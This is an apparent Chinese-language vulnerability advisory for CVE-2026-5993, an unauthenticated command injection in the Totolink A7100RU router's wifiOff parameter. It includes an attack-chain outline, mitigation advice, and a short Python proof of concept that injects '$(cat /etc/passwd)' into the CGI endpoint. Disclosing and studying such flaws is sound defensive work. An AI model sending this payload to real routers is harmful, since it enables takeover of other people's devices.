IPBUF安全漏洞报告
English
CVE-2026-5993 CVSS 9.8 严重

CVE-2026-5993 Totolink A7100RU远程命令注入漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5993
漏洞类型
操作系统命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A7100RU

相关标签

RCE命令注入IoT路由器Totolink

漏洞概述

Totolink A7100RU路由器特定版本中存在一个严重的远程命令注入漏洞。该漏洞源于CGI处理程序中的setWiFiGuestCfg函数未能正确过滤用户输入。攻击者可利用此漏洞,通过对wifiOff参数进行恶意构造,在无需认证的情况下远程执行任意系统命令,从而完全控制设备。

技术细节

该漏洞位于Totolink A7100RU设备的Web管理接口/cgi-bin/cstecgi.cgi脚本中。具体而言,setWiFiGuestCfg函数在处理访客WiFi配置请求时,对wifiOff参数缺乏足够的输入验证。攻击者可以向受影响端点发送特制的HTTP POST请求,在wifiOff参数中注入Shell元字符(如分号或管道符)。由于后端程序直接将此参数拼接到系统命令中执行,攻击者注入的命令将被操作系统解析并运行。鉴于CVSS 3.1评分为9.8,该漏洞攻击复杂度低,无需权限和用户交互,可导致机密性、完整性和可用性的全面丧失。

攻击链分析

STEP 1
探测
攻击者扫描网络,识别出存在漏洞的Totolink A7100RU设备及其Web管理端口。
STEP 2
构造攻击载荷
攻击者构造包含恶意Shell命令的HTTP POST请求,重点篡改setWiFiGuestCfg函数中的wifiOff参数。
STEP 3
发送恶意请求
向目标设备的/cgi-bin/cstecgi.cgi接口发送特制请求,无需身份验证即可触发漏洞。
STEP 4
执行命令
服务器端CGI脚本解析请求,将恶意参数拼接到系统命令中执行,攻击者获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def exploit(url): target = f"{url}/cgi-bin/cstecgi.cgi" headers = {"Content-Type": "application/x-www-form-urlencoded"} # Payload injection point: wifiOff parameter data = { "function": "setWiFiGuestCfg", "wifiOff": "$(cat /etc/passwd)" # Example malicious command } try: r = requests.post(target, data=data, headers=headers, timeout=5) print(f"[+] Status: {r.status_code}") print(r.text) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit("http://192.168.0.1")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施
如果无法立即升级固件,建议通过网络访问控制列表(ACL)禁止外部网络访问路由器的管理端口(通常是80或443端口),并将设备置于隔离的网络区域中,以降低被远程利用的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表